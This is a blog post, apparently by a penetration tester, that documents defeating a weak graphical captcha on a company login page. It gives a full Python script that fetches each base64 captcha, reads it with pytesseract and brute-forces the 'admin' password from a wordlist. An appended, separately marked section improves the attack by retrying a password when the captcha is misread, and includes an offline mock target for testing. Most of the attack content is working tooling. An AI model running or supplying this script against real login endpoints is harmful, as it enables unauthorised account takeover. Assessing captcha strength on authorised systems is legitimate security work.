It has been a while since I last updated this blog. Today I happened to be doing a security check on a system my company is about to put into production, and one of its weaknesses is a weak graphical captcha, so I will use it as the example for this post. The first thing I looked at was the login interface. The developers clearly had some security awareness: the login requires a graphical captcha, and the server-side captcha session expires. Looking at the captcha itself, however, the generated image is not very complex; it is fairly simple, which made me think of using Python's pytesseract module to recognise the captcha and brute-force the login.
Capturing the request sent when the captcha is clicked shows that the backend returns the image directly as a base64-encoded string inside a JSON reply.
The first step is therefore to fetch that reply and pull the base64 string out of it with a regular expression. A plain requests.get is all it takes:
        # request a captcha bound to checkKey 1608769685155 and extract the base64 body from the JSON reply
        url = requests.get("https://xxx.xxxx.com.cn/applxxxxx/sys/randomImage/1608769685155?_t=1608769685", headers=self.headers, timeout=1)
        re_re = re.compile(r'"result":"data:image/jpg;base64,(.+?)"')
        re_ = re.findall(re_re, url.text)
        return re_
The extracted base64 string is then passed to base64.b64decode, the decoded image is saved in the current directory, and pytesseract reads the characters from it:
        img_data = base64.b64decode(rere)            # raw JPEG bytes
        with open('img.jpg', 'wb') as f:
            f.write(img_data)
            f.flush()
        image = Image.open("img.jpg")
        code = pytesseract.image_to_string(image, config=self.tessdata_dir_config)
        return code.replace(' ', '').lower().strip()  # OCR text with whitespace removed, lower-cased
The last step is to capture the login request, rebuild it as the brute-force packet and run a password list through it. Note that the same checkKey value is sent with the captcha request and with the login, so each attempt fetches a fresh captcha bound to that key and submits its OCR result:
        data_search = {"remember_me": "true", "username": "admin", "password": password.strip(), "captcha": self.image(), "checkKey": 1608769685155}
        json_str = json.dumps(data_search)
        url = requests.post("https://xxxx.xxxx.com.cn/login", data=json_str, headers=self.headers, timeout=1)
        print(url.text, password.strip())
With the overall structure in place, the pieces can be put together into one script that recognises a new captcha for every attempt and brute-forces the login. The finished script (the wordlist path is passed as the first command-line argument):
import pytesseract
import requests
import re
import base64
import json
import sys
from PIL import Image


class imagescan(object):
    def __init__(self):
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36',
            'Content-Type': 'application/json;charset=UTF-8',
        }
        # raw string: the backslashes in the Windows path must not be read as escape sequences
        self.tessdata_dir_config = r'--tessdata-dir "C:\Program Files (x86)\Tesseract-OCR\tessdata"'

    def http(self):
        """Fetch a captcha for the fixed checkKey and return the base64 image strings found in the reply."""
        try:
            url = requests.get("https://xxxx.xxxx.com.cn/xxxx/sys/randoxxxxmImage/1608769685155?_t=1608769685", headers=self.headers, timeout=1)
            re_re = re.compile(r'"result":"data:image/jpg;base64,(.+?)"')
            return re_re.findall(url.text)
        except requests.RequestException as e:
            print("captcha request failed:", e)
            return []   # an empty list keeps image() from iterating over None

    def image(self):
        """Decode the first captcha image, save it as img.jpg and OCR it with tesseract."""
        for rere in self.http():
            img_data = base64.b64decode(rere)
            with open('img.jpg', 'wb') as f:
                f.write(img_data)
                f.flush()
            image = Image.open("img.jpg")
            code = pytesseract.image_to_string(image, config=self.tessdata_dir_config)
            return code.replace(' ', '').lower().strip()
        return ''   # no image could be fetched

    def url_http(self, password):
        """Submit one login attempt with a freshly fetched captcha."""
        try:
            # fetch the captcha once: calling image() twice fetched a second captcha,
            # so the code that was printed was not the one actually submitted
            captcha = self.image()
            print(captcha)
            data_search = {"remember_me": "true", "username": "admin", "password": password.strip(),
                           "captcha": captcha, "checkKey": 1608769685155}
            json_str = json.dumps(data_search)
            url = requests.post("https://xxxx.xxxx.com.cn/login", data=json_str, headers=self.headers, timeout=1)
            print(url.text, password.strip())
        except requests.RequestException as e:
            print("login request failed:", e)

    def httpurl(self):
        """Run every password in the wordlist given as the first command-line argument."""
        with open(sys.argv[1], 'r') as wordlist:
            for pwd in wordlist:
                self.url_http(pwd)


if __name__ == '__main__':
    image_scan = imagescan()
    image_scan.httpurl()
The result is shown in the figure.
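The script above moves on to the next password whatever the server answers. Whenever tesseract misreads the image the attempt fails with a captcha error, so a correct password can be discarded without anyone noticing, and an obviously unreadable OCR result still costs a login request. The following example is added here and is not code from the original post: it separates "captcha rejected" from "credentials rejected" and retries the same password in the first case, refetches the image when the OCR output cannot be a valid code, and parses the captcha JSON instead of regexing it. The 4-character alphanumeric captcha, the JSON field names (success, message) and the error messages are assumptions about the target, not something the post shows, and FakeTarget is a constructed stand-in for the two endpoints so the module runs offline.

```python
import base64
import json
import re

# Assumption (not stated in the post): the captcha is 4 letters or digits.
CAPTCHA_RE = re.compile(r"^[a-z0-9]{4}$")


def decode_captcha_image(body):
    """Return the image bytes from a {"result": "data:image/...;base64,..."} reply.
    Parsing JSON and splitting the data URL survives escaped slashes, a png MIME type
    and corrupt base64, which the post's regex does not."""
    data_url = json.loads(body)["result"]
    header, _, payload = data_url.partition(",")
    if not header.startswith("data:image/") or not header.endswith(";base64"):
        raise ValueError("unexpected captcha payload: %r" % header)
    return base64.b64decode(payload, validate=True)


def normalize_ocr(raw):
    """Clean tesseract output; None means 'cannot be a captcha, fetch a new image'."""
    code = re.sub(r"\s+", "", raw).lower()
    return code if CAPTCHA_RE.fullmatch(code) else None


def classify_login(body):
    """Map a login reply to 'success', 'captcha' (code rejected) or 'rejected'.
    Field names and messages are assumptions; adapt them to the real target."""
    try:
        reply = json.loads(body)
    except ValueError:
        return "rejected"          # non-JSON (e.g. an error page): treat as a failed attempt
    if reply.get("success") is True:
        return "success"
    message = str(reply.get("message", "")).lower()
    if "验证码" in message or "captcha" in message:
        return "captcha"
    return "rejected"


def brute_force(passwords, fetch_captcha, ocr, post_login, max_attempts=5):
    """Try each password, retrying the SAME password when the captcha was misread.
    fetch_captcha() -> captcha reply body; ocr(body) -> raw text;
    post_login(password, code) -> login reply body. Returns the working password or None."""
    for password in passwords:
        password = password.strip()
        for _ in range(max_attempts):
            code = normalize_ocr(ocr(fetch_captcha()))
            if code is None:
                continue               # unreadable image: fetch another, no login request spent
            verdict = classify_login(post_login(password, code))
            if verdict == "success":
                return password
            if verdict == "rejected":
                break                  # captcha accepted and password wrong: next password
            # verdict == "captcha": tesseract misread it, try this password again
    return None


class FakeTarget:
    """Constructed offline stand-in for the two endpoints (not the real system).
    The 'image' is just the captcha text base64-encoded, and ocr() replays a scripted
    list of tesseract misreads before returning the true text."""

    def __init__(self, real_password, ocr_noise):
        self.real_password = real_password
        self.ocr_noise = iter(ocr_noise)
        self.current = None
        self.logins = 0

    def fetch_captcha(self):
        self.current = "k7m2"          # a real server picks a fresh random code here
        image = base64.b64encode(self.current.encode()).decode()
        return json.dumps({"result": "data:image/jpg;base64," + image})

    def ocr(self, body):
        truth = decode_captcha_image(body).decode()
        return next(self.ocr_noise, truth)

    def post_login(self, password, code):
        self.logins += 1
        if code != self.current:
            return json.dumps({"success": False, "message": "captcha error"})
        if password != self.real_password:
            return json.dumps({"success": False, "message": "wrong username or password"})
        return json.dumps({"success": True})


def run_demo():
    """The correct password survives two misreads: one wrong code, one unreadable image."""
    target = FakeTarget("Passw0rd!", ocr_noise=["k 7m 2", "k7mz", "@@@@"])
    found = brute_force(["123456", "Passw0rd!"], target.fetch_captcha, target.ocr, target.post_login)
    return found, target.logins


if __name__ == "__main__":
    print(run_demo())                  # ('Passw0rd!', 3)
```

Against the real target, fetch_captcha is the GET from the post, ocr wraps pytesseract (Image.open(io.BytesIO(decode_captcha_image(body))) instead of writing img.jpg) and post_login is the POST; brute_force itself does not change. For single-line captchas tesseract's --psm 7 option (treat the image as one text line) usually reads noticeably better than the default page-segmentation mode.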